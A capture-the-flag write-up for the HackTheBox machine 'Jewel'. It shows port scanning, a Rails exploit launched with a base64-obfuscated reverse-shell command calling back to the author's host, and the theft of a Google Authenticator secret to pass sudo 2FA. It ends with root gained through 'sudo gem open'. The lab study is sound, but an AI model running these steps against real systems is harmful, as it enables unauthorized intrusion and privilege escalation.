This page looks best with JavaScript enabled

HackTheBox: Jewel

 ·  ☕ 3 min read


[jusepe@nix:~/Documents/HackTheBox/Jewel]$ sudo scan jewel.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,8000,8080
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 133
         Nmap: 14
         Total: 147

On port 8000 there is hosted GitWeb:


So checked the repository looking for versions:
Landing page

Found the Ruby on Rails version which is vulnerable:


Found this POC on github and got a shell with it:

[jusepe@nix:~/Documents/HackTheBox/Jewel]$ python3 jewel.htb 8080 1234 "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODE4MSAwPiYxCg== | base64 -d | bash"


Executed LinPeas to enumerate the system and got some hashes from sql:

Broke one of the hashes and the password was spongebob, then tried to use sudo and worked but we are requested a verification code:

(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill: 
Verification code: 
My pet ferret can type better than you!

Found the google authentication file inside the home folder:

(remote) bill@jewel.htb:/home/bill$ ls -la
total 52
drwxr-xr-x  6 bill bill 4096 Jan 20 08:33 .
drwxr-xr-x  3 root root 4096 Aug 26 09:32 ..
lrwxrwxrwx  1 bill bill    9 Aug 27 11:26 .bash_history -> /dev/null
-rw-r--r--  1 bill bill  220 Aug 26 09:32 .bash_logout
-rw-r--r--  1 bill bill 3526 Aug 26 09:32 .bashrc
drwxr-xr-x 15 bill bill 4096 Sep 17 17:16 blog
drwxr-xr-x  3 bill bill 4096 Aug 26 10:33 .gem
-rw-r--r--  1 bill bill   43 Aug 27 10:53 .gitconfig
drwx------  3 bill bill 4096 Jan 20 08:15 .gnupg
-r--------  1 bill bill   56 Aug 28 07:00 .google_authenticator
drwxr-xr-x  3 bill bill 4096 Aug 27 10:54 .local
-rw-r--r--  1 bill bill  807 Aug 26 09:32 .profile
lrwxrwxrwx  1 bill bill    9 Aug 27 11:26 .rediscli_history -> /dev/null
-r--------  1 bill bill   33 Jan 20 05:12 user.txt
-rw-r--r--  1 bill bill  116 Aug 26 10:43 .yarnrc
(remote) bill@jewel.htb:/home/bill$ cat .google_authenticator 

Downloaded a browser extension to generate the codes with the key I just got from the google authenticator:


However when introducing the 2F authentication code got an unexpected error message:

(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill: 
Verification code: 
Error "Operation not permitted" while writing config
stty: unknown mode: doofus

After some doing some reserch found this comment that suggested the date of the hosts weren’t matching, so got the date from the target:

(remote) bill@jewel.htb:/home/bill$ date +%s

Then setted that date to my own host:

[jusepe@nix:~/Documents/HackTheBox/Jewel]$ sudo date +%s -s @1611143531

Now sudo works just fine:

(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill: 
Verification code: 
Matching Defaults entries for bill on jewel:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, insults

User bill may run the following commands on jewel:
    (ALL : ALL) /usr/bin/gem

We can use gem as root so we can just escalate privileges following GTFObins:

(remote) bill@jewel.htb:/home/bill$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
(remote) root@jewel.htb:/home/bill$:/usr/lib/ruby/gems/2.5.0/gems/rdoc-6.0.1$ id
uid=0(root) gid=0(root) groups=0(root)
Share on

InTernet lover